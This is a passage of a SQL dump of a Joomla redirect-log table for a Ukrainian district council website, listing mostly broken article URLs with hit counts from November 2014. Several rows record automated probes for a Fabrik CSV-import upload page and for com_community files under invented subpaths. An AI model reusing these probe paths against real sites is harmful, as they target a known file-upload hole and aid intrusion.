00:00:00',301),(10658,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1067:2013-08-16-15-28-50&Itemid=93&lang=en','','','',1,0,'2014-11-10 06:20:38','0000-00-00 00:00:00',301),(10659,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1233:2014-03-03-10-28-35&Itemid=14&lang=en','','','',1,0,'2014-11-10 06:20:42','0000-00-00 00:00:00',301),(10660,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1005:-7-1943-&lang=ru','','','',1,0,'2014-11-10 06:20:47','0000-00-00 00:00:00',301),(10661,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1022:-lr-&Itemid=70&lang=en','','','',1,0,'2014-11-10 06:21:05','0000-00-00 00:00:00',301),(10662,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1009:2013-05-24-09-23-50&Itemid=14&lang=en','','','',1,0,'2014-11-10 06:21:44','0000-00-00 00:00:00',301),(10663,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1228:2014-02-27-14-42-41&Itemid=14&lang=ru','','','',1,0,'2014-11-10 06:22:52','0000-00-00 00:00:00',301);
INSERT INTO `fw3gt_redirect_links` VALUES (10664,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1096:2013-09-24-13-34-16&catid=53:--25102013-&Itemid=94&lang=ru','','','',2,0,'2014-11-10 06:23:48','0000-00-00 00:00:00',301),(10665,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1013:2013-06-01-03-58-38&Itemid=14&lang=ru','','','',1,0,'2014-11-10 06:23:55','0000-00-00 00:00:00',301),(10666,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=997:-27-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',1,0,'2014-11-10 06:24:06','0000-00-00 00:00:00',301),(10667,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1014:2013-06-03-06-43-44&Itemid=14&lang=ru','','','',1,0,'2014-11-10 06:24:17','0000-00-00 00:00:00',301),(10668,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1016:2013-06-03-11-41-36&Itemid=14&lang=ru','','','',1,0,'2014-11-10 06:24:43','0000-00-00 00:00:00',301),(10669,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1228:2014-02-27-14-42-41&Itemid=14&lang=uk','','','',1,0,'2014-11-10 06:25:06','0000-00-00 00:00:00',301),(10670,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1228:2014-02-27-14-42-41&Itemid=14&lang=en','','','',1,0,'2014-11-10 06:25:53','0000-00-00 00:00:00',301),(10671,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1005:-7-1943-&Itemid=14&lang=uk','','','',1,0,'2014-11-10 06:27:19','0000-00-00 00:00:00',301),(10672,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1006:2013-05-08-19-01-14&catid=11&Itemid=14&lang=uk','','','',1,0,'2014-11-10 06:29:08','0000-00-00 00:00:00',301),(10673,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1009:2013-05-24-09-23-50&catid=11&Itemid=14&lang=uk','','','',1,0,'2014-11-10 06:29:43','0000-00-00 00:00:00',301),(10674,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1221:2014-02-22-08-09-27&Itemid=18&lang=uk','','','',1,0,'2014-11-10 06:30:16','0000-00-00 00:00:00',301),(10675,'http://www.malyn-rayrada.org.ua/index.php?view=article&catid=11:2010-06-05-14-33-33&id=1116:-2013-&tmpl=component&print=1&layout=default&page=&lang=uk','','','',2,0,'2014-11-10 06:31:39','0000-00-00 00:00:00',301),(10676,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1106:-qq&Itemid=18&lang=en','','','',1,0,'2014-11-10 06:31:44','0000-00-00 00:00:00',301),(10677,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1230:l-r&Itemid=14&lang=ru','','','',1,0,'2014-11-10 06:33:09','0000-00-00 00:00:00',301),(10678,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1226:-1996-2004-&Itemid=14&lang=en','','','',1,0,'2014-11-10 06:33:21','0000-00-00 00:00:00',301),(10679,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1086:2013-09-16-13-00-16&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',2,0,'2014-11-10 06:33:24','0000-00-00 00:00:00',301),(10680,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1227:2014-02-25-07-36-58&Itemid=14&lang=en','','','',1,0,'2014-11-10 06:33:25','0000-00-00 00:00:00',301),(10681,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1107:c-&Itemid=14&lang=uk','','','',1,0,'2014-11-10 06:33:38','0000-00-00 00:00:00',301),(10682,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1230:l-r&Itemid=14&lang=en','','','',1,0,'2014-11-10 06:34:22','0000-00-00 00:00:00',301),(10683,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1096:2013-09-24-13-34-16&catid=53:--25102013-&Itemid=94&lang=uk','','','',2,0,'2014-11-10 06:37:19','0000-00-00 00:00:00',301),(10684,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1286:2014-04-23-06-48-27&catid=10&Itemid=17&lang=uk','','','',3,0,'2014-11-10 08:17:23','0000-00-00 00:00:00',301),(10685,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=991:2013-04-22-08-24-54&catid=11&lang=en&Itemid=0','','','',1,0,'2014-11-10 10:31:01','0000-00-00 00:00:00',301),(10686,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=991:2013-04-22-08-24-54&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-11-10 10:31:03','0000-00-00 00:00:00',301),(10687,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=991:2013-04-22-08-24-54&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-11-10 10:31:05','0000-00-00 00:00:00',301),(10688,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1000:1&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-11-10 13:18:44','0000-00-00 00:00:00',301),(10689,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=915:-14-2012-340-l-2012-2013-&catid=47:-21022013-&Itemid=86&lang=uk','','','',4,0,'2014-11-10 14:03:42','0000-00-00 00:00:00',301),(10690,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=915:--------14--2012--340-l---------2012-2013-------------&catid=36&Itemid=70&lang=ru','','','',3,0,'2014-11-10 14:03:49','0000-00-00 00:00:00',301),(10691,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1269:-3110&catid=57:--15042014-&Itemid=98&lang=uk','','','',2,0,'2014-11-10 14:15:50','0000-00-00 00:00:00',301),(10692,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1269:-3110&catid=57:--15042014-&Itemid=98&lang=ru','','','',2,0,'2014-11-10 14:20:10','0000-00-00 00:00:00',301),(10693,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1114:---------------lr---&catid=36&Itemid=70&lang=en','','','',3,0,'2014-11-10 14:33:55','0000-00-00 00:00:00',301),(10694,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=915:-14-2012-340-l-2012-2013-&catid=47:-21022013-&Itemid=86&lang=ru','','','',1,0,'2014-11-10 15:15:26','0000-00-00 00:00:00',301),(10695,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1140:80-1932-33-l-r&catid=11&lang=ru','','','',2,0,'2014-11-10 15:19:25','0000-00-00 00:00:00',301),(10696,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=915:-14-2012-340-l-2012-2013-&catid=47:-21022013-&Itemid=86&lang=uk','','','',2,0,'2014-11-10 15:22:57','0000-00-00 00:00:00',301),(10697,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1202:2014-01-31-07-45-54&catid=36&Itemid=70&lang=ru','','','',7,0,'2014-11-10 15:41:26','0000-00-00 00:00:00',301),(10698,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=945:2013-03-04-07-28-58&catid=36&Itemid=70&lang=ru','','','',2,0,'2014-11-10 15:52:55','0000-00-00 00:00:00',301),(10699,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1241:2014-03-17-07-05-06&catid=57:--15042014-&Itemid=98&lang=en','','','',2,0,'2014-11-10 16:33:05','0000-00-00 00:00:00',301),(10700,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1190:-2014-&catid=56:--03022014-&Itemid=97&lang=ru','','','',3,0,'2014-11-10 17:25:12','0000-00-00 00:00:00',301),(10701,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1190:-2014-&catid=56:--03022014-&Itemid=97&lang=uk','','','',3,0,'2014-11-10 17:52:18','0000-00-00 00:00:00',301),(10702,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1024:----l---------2011-2014-r-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',3,0,'2014-11-10 17:57:52','0000-00-00 00:00:00',301),(10703,'http://malyn-rayrada.org.ua/tinyempires/components/com_community/index.html','','','',1,0,'2014-11-10 18:05:12','0000-00-00 00:00:00',301),(10704,'http://malyn-rayrada.org.ua/tinyempires/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',1,0,'2014-11-10 18:05:18','0000-00-00 00:00:00',301),(10705,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1329:2014-06-02-11-51-47&catid=11&lang=en&Itemid=0','','','',3,0,'2014-11-10 18:24:55','0000-00-00 00:00:00',301),(10706,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1024:-l-2011-2014-r-&catid=51:--19072013-&Itemid=92&lang=ru','','','',2,0,'2014-11-10 18:37:56','0000-00-00 00:00:00',301),(10707,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1059:2013-07-24-05-42-15&catid=11&lang=en&Itemid=','','','',1,0,'2014-11-10 18:54:07','0000-00-00 00:00:00',301),(10708,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=941:2013-02-27-14-30-15&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-11-10 18:54:15','0000-00-00 00:00:00',301),(10709,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1036:2013-06-25-10-02-48&catid=11&lang=en&Itemid=','','','',1,0,'2014-11-10 19:00:10','0000-00-00 00:00:00',301),(10710,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1256:2014-03-27-17-22-43&catid=11&Itemid=14&lang=uk','','','',11,0,'2014-11-10 21:39:30','0000-00-00 00:00:00',301),(10711,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1256:2014-03-27-17-22-43&catid=11&Itemid=14&lang=ru','','','',6,0,'2014-11-10 21:46:46','0000-00-00 00:00:00',301),(10712,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1184:----27----6-&catid=11&lang=ru&Itemid=0','','','',7,0,'2014-11-10 22:55:48','0000-00-00 00:00:00',301),(10713,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1271:2014-04-09-05-14-20&catid=10&Itemid=17&lang=ru','','','',2,0,'2014-11-10 23:16:48','0000-00-00 00:00:00',301),(10714,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1226:-1996-2004-&catid=11&lang=en&Itemid=','','','',4,0,'2014-11-10 23:18:41','0000-00-00 00:00:00',301),(10715,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1226:-1996-2004-&catid=11&lang=en&Itemid=0','','','',2,0,'2014-11-10 23:33:22','0000-00-00 00:00:00',301),(10716,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=958:-2010-2015-&catid=49:--12042013-&Itemid=88&lang=ru','','','',4,0,'2014-11-10 23:52:59','0000-00-00 00:00:00',301),(10717,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1271:2014-04-09-05-14-20&catid=10:2010-06-05-13-46-44&Itemid=17&lang=ru','','','',2,0,'2014-11-11 00:07:51','0000-00-00 00:00:00',301),(10718,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1271:2014-04-09-05-14-20&catid=10:2010-06-05-13-46-44&Itemid=17&lang=uk','','','',2,0,'2014-11-11 00:22:01','0000-00-00 00:00:00',301),(10719,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=941:2013-02-27-14-30-15&catid=11&lang=uk&Itemid=','','','',1,0,'2014-11-11 00:35:28','0000-00-00 00:00:00',301),(10720,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1286:2014-04-23-06-48-27&catid=10&Itemid=17&lang=ru','','','',1,0,'2014-11-11 01:42:37','0000-00-00 00:00:00',301),(10721,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1046:-2013-&catid=11&lang=uk&Itemid=','','','',1,0,'2014-11-11 02:53:13','0000-00-00 00:00:00',301),(10722,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1146:2013-11-27-10-09-00&catid=11&lang=ru','','','',2,0,'2014-11-11 04:43:02','0000-00-00 00:00:00',301),(10723,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1236:2014-03-07-06-36-44&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',14,0,'2014-11-11 10:55:23','0000-00-00 00:00:00',301),(10724,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1019:2013-06-06-11-26-38&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',1,0,'2014-11-11 12:18:56','0000-00-00 00:00:00',301),(10725,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1131:9-------&catid=11&lang=en&Itemid=0','','','',6,0,'2014-11-11 12:37:09','0000-00-00 00:00:00',301),(10726,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1125:2013-10-31-07-20-16&lang=uk&option=com_content&view=article','','http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11%3A2010-06-05-14-33-33&id=1125%3A2013-10-31-07-20-16&lang=uk&option=com_content&view=artic','',5,0,'2014-11-11 12:40:54','0000-00-00 00:00:00',301),(10727,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1331:2014-06-04-07-15-27&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',1,0,'2014-11-11 12:42:23','0000-00-00 00:00:00',301),(10728,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1331:2014-06-04-07-15-27&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',2,0,'2014-11-11 12:42:27','0000-00-00 00:00:00',301),(10729,'http://www.malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=4&Itemid=1&lang=en&limitstart=20','','','',2,0,'2014-11-11 12:50:57','0000-00-00 00:00:00',301),(10730,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/media/system/images/mootree_loader.gif','','http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/913-pro-zatverdzhennya-rozporyadzhennya-golovi-rajonnoji-derzhavnoji-administr','',55,0,'2014-11-11 14:31:40','0000-00-00 00:00:00',301),(10731,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1318:----3110&catid=36&Itemid=70&lang=en','','','',1,0,'2014-11-11 16:01:57','0000-00-00 00:00:00',301),(10732,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1343:2014-06-14-17-26-47&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',3,0,'2014-11-11 16:46:54','0000-00-00 00:00:00',301),(10733,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1081:-2013-2017-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',1,0,'2014-11-11 20:32:22','0000-00-00 00:00:00',301),(10734,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1036:2013-06-25-10-02-48&lang=ru&option=com_content&view=article','','','',2,0,'2014-11-12 00:07:29','0000-00-00 00:00:00',301),(10735,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1312:2014-05-08-08-59-19&lang=uk&option=com_content&view=article','','','',3,0,'2014-11-12 00:07:32','0000-00-00 00:00:00',301),(10736,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1316:2014-05-20-12-49-29&lang=uk&option=com_content&view=article','','','',1,0,'2014-11-12 00:07:34','0000-00-00 00:00:00',301),(10737,'http://www.malyn-rayrada.org.ua/index.php?Itemid=95&catid=54&id=1135:2013-11-15-07-00-15&lang=ru&option=com_content&view=article','','','',4,0,'2014-11-12 00:07:36','0000-00-00 00:00:00',301),(10738,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1116:-2013-&lang=ru&option=com_content&view=article','','','',3,0,'2014-11-12 00:07:40','0000-00-00 00:00:00',301),(10739,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=990:-2013-&lang=ru&option=com_content&view=article','','','',1,0,'2014-11-12 00:07:56','0000-00-00 00:00:00',301),(10740,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1104:------------------lr&lang=uk&option=com_content&view=article','','','',1,0,'2014-11-12 00:34:57','0000-00-00 00:00:00',301),(10741,'http://www.malyn-rayrada.org.ua/index.php?Itemid=86&catid=47:-21022013-&id=926:2013-02-21-09-02-30&lang=uk&option=com_content&view=article','','','',7,0,'2014-11-12 00:35:15','0000-00-00 00:00:00',301),(10742,'http://www.malyn-rayrada.org.ua/sk/components/com_community/index.html','','','',1,0,'2014-11-12 01:25:43','0000-00-00 00:00:00',301),(10743,'http://www.malyn-rayrada.org.ua/sk/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',1,0,'2014-11-12 01:25:46','0000-00-00 00:00:00',301),(10744,'http://www.malyn-rayrada.org.ua/index.php?Itemid=92&catid=51:--19072013-&id=1058:-2013-&lang=ru&option=com_content&view=article','','','',3,0,'2014-11-12 01:41:44','0000-00-00 00:00:00',301),(10745,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1109:2013-10-18-10-25-30&lang=ru&option=com_content&view=article','','','',4,0,'2014-11-12 01:41:52','0000-00-00 00:00:00',301),(10746,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36&id=1090:-l-r-&lang=uk&option=com_content&view=article','','','',5,0,'2014-11-12 01:42:06','0000-00-00 00:00:00',301),(10747,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1256:2014-03-27-17-22-43&lang=uk&option=com_content&view=article','','','',5,0,'2014-11-12 02:08:31','0000-00-00 00:00:00',301),(10748,'http://www.malyn-rayrada.org.ua/pravo/index.php','','','',1,0,'2014-11-12 02:38:15','0000-00-00 00:00:00',301),(10749,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1225:2014-02-24-13-27-21&catid=11&lang=ru&Itemid=','','','',4,0,'2014-11-12 02:51:44','0000-00-00 00:00:00',301),(10750,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1225:2014-02-24-13-27-21&catid=11&lang=ru&Itemid=','','','',3,0,'2014-11-12 03:06:33','0000-00-00 00:00:00',301),(10751,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1317:2014-05-25-18-25-09&lang=ru&option=com_content&view=article','','','',3,0,'2014-11-12 03:15:28','0000-00-00 00:00:00',301),(10752,'http://www.malyn-rayrada.org.ua/index.php?Itemid=17&catid=10&id=1259:1&lang=uk&option=com_content&view=article','','','',2,0,'2014-11-12 03:15:48','0000-00-00 00:00:00',301),(10753,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=1057:--22072013--2100-&lang=ru&option=com_content&view=article','','','',1,0,'2014-11-12 03:43:18','0000-00-00 00:00:00',301),(10754,'http://www.malyn-rayrada.org.ua/index.php?Itemid=66&catid=33:-20052011&id=319:-2009-2011-&lang=uk&option=com_content&view=article','','','',7,0,'2014-11-12 03:43:23','0000-00-00 00:00:00',301),(10755,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1075:2013-09-06-09-25-33&lang=ru&option=com_content&view=article','','','',2,0,'2014-11-12 05:16:43','0000-00-00 00:00:00',301),(10756,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=963:2013-03-13-06-16-53&lang=uk&option=com_content&view=article','','','',1,0,'2014-11-12 06:23:07','0000-00-00 00:00:00',301),(10757,'http://www.malyn-rayrada.org.ua/index.php?Itemid=17&catid=10:2010-06-05-13-46-44&id=1289:2014-04-23-06-53-01&lang=ru&option=com_content&view=article','','','',1,0,'2014-11-12 06:23:21','0000-00-00 00:00:00',301),(10758,'http://www.malyn-rayrada.org.ua/index.php?Itemid=97&catid=56&id=1198:2014-01-31-07-37-58&lang=ru&option=com_content&view=article','','','',5,0,'2014-11-12 07:57:18','0000-00-00 00:00:00',301),(10759,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1313:2014-05-14-10-00-55&lang=ru&option=com_content&view=article','','','',2,0,'2014-11-12 08:25:13','0000-00-00 00:00:00',301),(10760,'http://www.malyn-rayrada.org.ua/index.php?Itemid=88&catid=49:--12042013-&id=958:-2010-2015-&lang=uk&option=com_content&view=article','','','',1,0,'2014-11-12 09:31:19','0000-00-00 00:00:00',301),(10761,'http://www.malyn-rayrada.org.ua/index.php?Itemid=98&catid=57:--15042014-&id=1246:-2013-&lang=uk&option=com_content&view=article','','','',1,0,'2014-11-12 09:31:28','0000-00-00 00:00:00',301),(10762,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1063:2013-08-02-17-32-04&lang=ru&option=com_content&view=article','','','',2,0,'2014-11-12 09:31:39','0000-00-00 00:00:00',301),(10763,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1217:2014-02-21-13-52-36&lang=ru&option=com_content&view=article','','','',1,0,'2014-11-12 09:59:37','0000-00-00 00:00:00',301),(10764,'http://malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=4&Itemid=0&lang=en','','','',4,0,'2014-11-12 10:06:40','0000-00-00 00:00:00',301),(10765,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=999:2013-04-28-05-21-05&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',2,0,'2014-11-12 10:11:12','0000-00-00 00:00:00',301),(10766,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1233:2014-03-03-10-28-35&catid=11&lang=uk','','','',4,0,'2014-11-12 10:32:49','0000-00-00 00:00:00',301),(10767,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1176:-27-&lang=ru&option=com_content&view=article','','','',1,0,'2014-11-12 11:05:00','0000-00-00 00:00:00',301),(10768,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1084:-qq&lang=ru&option=com_content&view=article','','','',3,0,'2014-11-12 11:05:28','0000-00-00 00:00:00',301),(10769,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1275:2014-04-10-13-24-47&lang=uk&option=com_content&view=article','','','',1,0,'2014-11-12 11:05:32','0000-00-00 00:00:00',301),(10770,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1358:2014-07-07-08-11-22&lang=uk&option=com_content&view=article','','','',1,0,'2014-11-12 11:34:21','0000-00-00 00:00:00',301),(10771,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1312:2014-05-08-08-59-19&lang=uk&option=com_content&view=article','','','',3,0,'2014-11-12 11:34:43','0000-00-00 00:00:00',301),(10772,'http://www.malyn-rayrada.org.ua/ceim/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',1,0,'2014-11-12 12:44:32','0000-00-00 00:00:00',301),(10773,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=1004:2013-05-04-11-41-00&lang=uk&option=com_content&view=article','','','',2,0,'2014-11-12 13:09:29','0000-00-00 00:00:00',301),(10774,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36&id=1027:-2013-2013-&lang=uk&option=com_content&view=article','','','',1,0,'2014-11-12 14:13:55','0000-00-00 00:00:00',301),(10775,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1219:-2004-&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-11-12 14:15:54','0000-00-00 00:00:00',301),(10776,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1001:2013-04-30-12-14-17&lang=uk&option=com_content&view=article','','','',3,0,'2014-11-12 14:43:28','0000-00-00 00:00:00',301),(10777,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=999:2013-04-28-05-21-05&lang=ru&option=com_content&view=article','','','',1,0,'2014-11-12 15:47:58','0000-00-00 00:00:00',301),(10778,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1073:2013-08-30-11-12-19&lang=uk&option=com_content&view=article','','','',1,0,'2014-11-12 16:17:13','0000-00-00 00:00:00',301),(10779,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=984:-20-&catid=11&lang=ru&Itemid=','','','',5,0,'2014-11-12 16:32:36','0000-00-00 00:00:00',301),(10780,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1040:2013-07-01-14-27-50&catid=11&lang=en&Itemid=','','','',1,0,'2014-11-12 17:00:41','0000-00-00 00:00:00',301),(10781,'http://malyn-rayrada.org.ua/en/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',1,0,'2014-11-12 17:17:41','0000-00-00 00:00:00',301),(10782,'http://www.malyn-rayrada.org.ua/index.php?Itemid=97&catid=56:--03022014-&id=1185:2014-01-28-09-38-54&lang=uk&option=com_content&view=article','','','',4,0,'2014-11-12 17:21:58','0000-00-00 00:00:00',301),(10783,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1062:2013-07-29-13-33-29&lang=ru&option=com_content&view=article','','','',4,0,'2014-11-12 17:22:00','0000-00-00 00:00:00',301),(10784,'http://www.malyn-rayrada.org.ua/index.php?Itemid=94&catid=53&id=1118:2013-10-25-12-24-30&lang=uk&option=com_content&view=article','','','',3,0,'2014-11-12 17:22:09','0000-00-00 00:00:00',301),(10785,'http://www.malyn-rayrada.org.ua/index.php?Itemid=97&catid=56:--03022014-&id=1191:-2014-&lang=uk&option=com_content&view=article','','','',1,0,'2014-11-12 17:22:11','0000-00-00 00:00:00',301),(10786,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1062:2013-07-29-13-33-29&lang=ru&option=com_content&view=article','','','',3,0,'2014-11-12 17:22:39','0000-00-00 00:00:00',301),(10787,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36&id=1078:-2007-2015-&lang=uk&option=com_content&view=article','','','',1,0,'2014-11-12 17:22:43','0000-00-00 00:00:00',301),(10788,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=946:-l-r-2011-2015-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',1,0,'2014-11-12 17:50:17','0000-00-00 00:00:00',301),(10789,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=924:2013-02-20-19-06-08&lang=ru&option=com_content&view=article','','','',3,0,'2014-11-12 17:52:31','0000-00-00 00:00:00',301),(10790,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36&id=1198:2014-01-31-07-37-58&lang=ru&option=com_content&view=article','','','',1,0,'2014-11-12 18:55:56','0000-00-00 00:00:00',301),(10791,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=1100:2013-10-02-18-03-10&lang=ru&option=com_content&view=article','','','',1,0,'2014-11-12 18:56:06','0000-00-00 00:00:00',301),(10792,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1292:-i-&lang=en&option=com_content&view=article','','','',5,0,'2014-11-12 18:56:16','0000-00-00 00:00:00',301),(10793,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36&id=1240:2014-03-17-07-01-32&lang=uk&option=com_content&view=article','','','',2,0,'2014-11-12 18:56:18','0000-00-00 00:00:00',301),(10794,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1075:2013-09-06-09-25-33&lang=uk&option=com_content&view=article','','','',1,0,'2014-11-12 18:56:34','0000-00-00 00:00:00',301),(10795,'http://www.malyn-rayrada.org.ua/index.php?Itemid=92&catid=51&id=1022:-lr-&lang=uk&option=com_content&view=article','','','',3,0,'2014-11-12 19:26:20','0000-00-00 